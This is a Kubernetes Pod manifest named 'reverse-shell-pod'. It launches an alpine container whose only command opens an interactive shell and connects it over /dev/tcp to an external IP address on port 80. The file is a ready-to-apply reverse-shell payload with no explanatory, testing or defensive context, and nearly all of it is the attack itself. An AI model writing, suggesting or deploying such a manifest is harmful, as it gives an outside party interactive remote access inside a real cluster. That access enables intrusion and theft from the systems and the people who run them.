apiVersion: v1
kind: Pod
metadata:
  name: reverse-shell-pod
spec:
  containers:
  - name: shell-container
    image: alpine
    command: ["/bin/sh", "-c"]
    args:
    - |
      /bin/sh -i >& /dev/tcp/31.131.21.53/80 0>&1
